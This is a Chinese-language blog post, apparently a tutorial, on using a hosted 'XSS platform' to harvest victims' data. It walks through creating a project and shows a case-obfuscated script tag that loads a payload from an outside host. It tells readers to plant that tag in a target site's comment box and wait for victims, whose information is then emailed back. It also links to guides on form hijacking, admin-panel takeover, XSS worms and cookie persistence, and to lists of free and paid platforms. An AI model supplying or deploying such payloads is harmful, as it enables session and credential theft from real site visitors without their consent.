0%

'XSS平台的使用'

登录进去后,首先要创建一个项目。这个项目主要是为了标记你想测试某个网站。如下图

点击创建项目之后如下图:

然后点击下一步。然后配置项目:
配置项目功能(这里如果不懂建议只勾选“默认模块”)
这里不要太多模块都勾选,非常非常容易导致JS报错,如果报错,那么可能你就收不到对方的中招信息了。尽量只勾选一个或两个。

然后点击下一步,就完成了。完成后如下图:

我们的平台是支持https的,如

1
<sCRiPt sRC=https://xxx.top/nDEy></sCrIpT>

如何从其他地方查看上面的项目代码呢?(假装有其他项目)如下图:
随意点击一个项目,查看代码

至此最基本的XSS平台项目及使用方法建立完毕了,剩下就是拿你自己的项目代码来做测试喽。
假设我想测试留言的地方就可以如下图:
放入你的项目代码等对方中招
如果对方过滤了就没办法了。然后如果对方中招了,那么你的XSS平台就会有收到对方的信息。(邮箱秒到)

网络上免费XSS平台集合:https://sec.ly.com/xsspt.txt
这里全部都是网络上公开的,不公开的,免费的收费的XSS平台集合,任君选择。

一些XSS平台进阶的使用方法:
图片XSS 获取对方后台 使用讲解https://woj.app/1785.html
XSS 之 form表单劫持(通用明文记录)https://woj.app/1684.html (这里推荐使用平台最新表单劫持插件,无需设置,直接可用)
xss获取后台二级密码 – URL跳转 (地址栏不变) https://woj.app/1820.html
后台(内网)打穿神器→xss蠕虫 https://woj.app/2173.html
xss平台持久cookie说明 keepsession说明 https://woj.app/1907.html
不用cookie 一个储存XSS对“某btc平台”攻城略地 https://woj.app/3035.html

XSS经典案例
百度搜索框反射XSS分析 (2015年案例) https://woj.app/2089.html
一波三折之某站点反射XSS (绕WAF防御) https://woj.app/1603.html
京东驳回的一枚轻易paylod而不易exploit的xss的开发过程 https://woj.app/1590.html

本文为素念修改文章,原创作者gdd,原创文章链接https://woj.app/2894.html

感谢HACK学习提供的XSS平台,欢迎加入HACK学习星球(嘉宾:4年PHP开发经验大牛、擅长代码审计、bypass姿势,内网渗透大牛、5年安全经验)获取高级进阶资料